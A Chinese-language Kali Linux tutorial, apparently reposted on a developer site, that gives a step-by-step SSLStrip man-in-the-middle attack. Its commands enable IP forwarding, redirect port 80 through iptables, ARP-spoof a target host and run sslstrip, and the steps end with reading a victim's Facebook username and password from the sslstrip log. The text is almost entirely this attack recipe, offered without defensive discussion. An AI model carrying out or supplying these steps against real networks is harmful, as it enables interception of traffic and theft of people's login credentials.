内容简介:利用SSLStrip发起中间人攻击可以透明地劫持网络中的http流量,查找HTTPS链接并重定向,然后将这些链接映射到类似的HTTP链接中或者同形的HTTPS链接。它还支持提供类似锁定图标,选择性日志记录和拒绝会话的模式。step1
利用SSLStrip发起中间人攻击可以透明地劫持网络中的http流量,查找HTTPS链接并重定向,然后将这些链接映射到类似的HTTP链接中或者同形的HTTPS链接。
它还支持提供类似锁定图标,选择性日志记录和拒绝会话的模式。
step1
首先我们将设备设置为转发模式,这样我们的设备就可以转发目标不是我们设备的数据包。
echo 1>/proc/sys/net/ipv4/ip_forward
step2
还需要设置iptables,将流量从80端口重定向到8080端口,确保出站连接发送到sslstrip中。
iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-port 8080
step3
需要找到我们的网关
route -n
前三步如图所示
step4
接下来我们需要找到目标主机的IP地址
step5
攻击者利用ARP欺骗技术将虚假的ARP消息发送到局域网中。
arpspoof -i -t
step6
现在我们打开一个新的终端并监听8080端口,命令如下
sslstrip -l 8080
step7
现在我们转到受害主机中,并且在浏览器中输入facebook.com,我们知道Facebook本来是使用的HTTPS协议,但是这里我们看到与Facebook是通过http建立的连接。
step8
现在,返回到家目录,查看sslstrip.log日志文件,我们可以看到受害者登录时输入的用户名和密码,如图:
就是这么easy,我们就拿到了受害者的凭证。
更多kali Linux教程,请参考:
· HPING3— 网络扫描器-包生成器
以上就是本文的全部内容,希望对大家的学习有所帮助,也希望大家多多支持 码农网
猜你喜欢:- 无视HTTPS发起中间人攻击
- GitHub 中间人攻击原理分析
- Github中间人攻击原理分析
- 中间人攻击框架xerosploit介绍
- RDP蜜罐:中间人技术的实践
- 中间人攻击,HTTPS 也可以被碾压
本站部分资源来源于网络,本站转载出于传递更多信息之目的,版权归原作者或者来源机构所有,如转载稿涉及版权问题,请联系我们。
程式之美-微軟技術面試心得
編程之美小 / 悅知文化 / 2008.06.20 / 490元
書內容分為以下幾個部分: ▓ 遊戲之樂:從遊戲和其他有趣問題出發,化繁為簡,分析總結。 ▓ 數字之魅:程式設計的過程實際上就是和數字及字元打交道的過程。這一部分收集了一些這方面的有趣探討。 ▓ 結構之法:彙集了常見的對字串、鏈表、佇列,以及樹進行操作的題目。 ▓ 數學之趣:列舉了一些不需要寫具體程式的數學問題,鍛煉讀者的抽象思考能力。 ▓ 書中絕大部分題目都提供了詳細......一起来看看 《程式之美-微軟技術面試心得》 这本书的介绍吧!
HTML 压缩/解压工具
在线压缩/解压 HTML 代码
随机密码生成器
多种字符组合密码